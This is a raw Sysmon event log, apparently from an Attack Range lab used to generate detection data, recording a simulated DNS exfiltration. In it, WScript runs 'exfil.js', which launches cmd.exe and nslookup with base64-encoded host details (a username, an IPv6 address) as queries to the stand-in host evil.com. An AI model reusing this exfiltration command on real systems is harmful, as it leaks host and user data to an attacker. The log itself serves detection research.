23542300x8000000000000000213791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.045{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldjeuo.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.014{2E1864BB-18F9-629A-9E45-000000005F02}51767744C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-9F45-000000005F02}7232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.014{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-9F45-000000005F02}7232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.014{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.014{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.014{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.014{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.014{2E1864BB-18F9-629A-9D45-000000005F02}78681736C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-9F45-000000005F02}7232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.018{2E1864BB-18FA-629A-9F45-000000005F02}7232C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-9D45-000000005F02}7868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldjeuo.tmp 2>&1 23542300x800000000000000044819Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:46.503{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A38E15ED1DBE13863D4D7B7E18A17C75,SHA256=F84E33E5A6D59BDCEBEA44816A7F166FA24F4C1425C633A9D78DB3CF9B039E5B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.807{00000000-0000-0000-0000-000000000000}2088<unknown process>-udpfalsefalse127.0.0.1-51149-false127.0.0.1-53domain 354300x8000000000000000214456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.806{00000000-0000-0000-0000-000000000000}2088<unknown process>-udptruefalse127.0.0.1-51149-false127.0.0.1-53domain 354300x8000000000000000214455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.806{00000000-0000-0000-0000-000000000000}2088<unknown process>-udpfalsefalse127.0.0.1-51148-false127.0.0.1-53domain 354300x8000000000000000214454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.806{00000000-0000-0000-0000-000000000000}2088<unknown process>-udptruefalse127.0.0.1-51148-false127.0.0.1-53domain 354300x8000000000000000214453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.806{00000000-0000-0000-0000-000000000000}2088<unknown process>-udpfalsefalse127.0.0.1-51147-false127.0.0.1-53domain 354300x8000000000000000214452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.806{00000000-0000-0000-0000-000000000000}2088<unknown process>-udptruefalse127.0.0.1-51147-false127.0.0.1-53domain 354300x8000000000000000214451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-51146-false127.0.0.1-53domain 10341000x8000000000000000214450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.966{2E1864BB-18FB-629A-E345-000000005F02}43366516C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-E445-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.966{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.966{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.966{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.966{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.966{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-E445-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.966{2E1864BB-18FB-629A-E245-000000005F02}61567340C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-E445-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.976{2E1864BB-18FB-629A-E445-000000005F02}5896C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-E245-000000005F02}6156C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnnd.tmp 2>&1 10341000x8000000000000000214442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.950{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-E345-000000005F02}4336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.950{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-E345-000000005F02}4336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.950{2E1864BB-18FB-629A-E345-000000005F02}43366516C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-E245-000000005F02}6156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.935{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-E345-000000005F02}4336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.935{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.935{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.935{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.935{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.935{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-E245-000000005F02}6156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.935{2E1864BB-18E0-629A-6742-000000005F02}39767184C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-E245-000000005F02}6156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.937{2E1864BB-18FB-629A-E245-000000005F02}6156C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnnd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.919{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwdmyjk.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 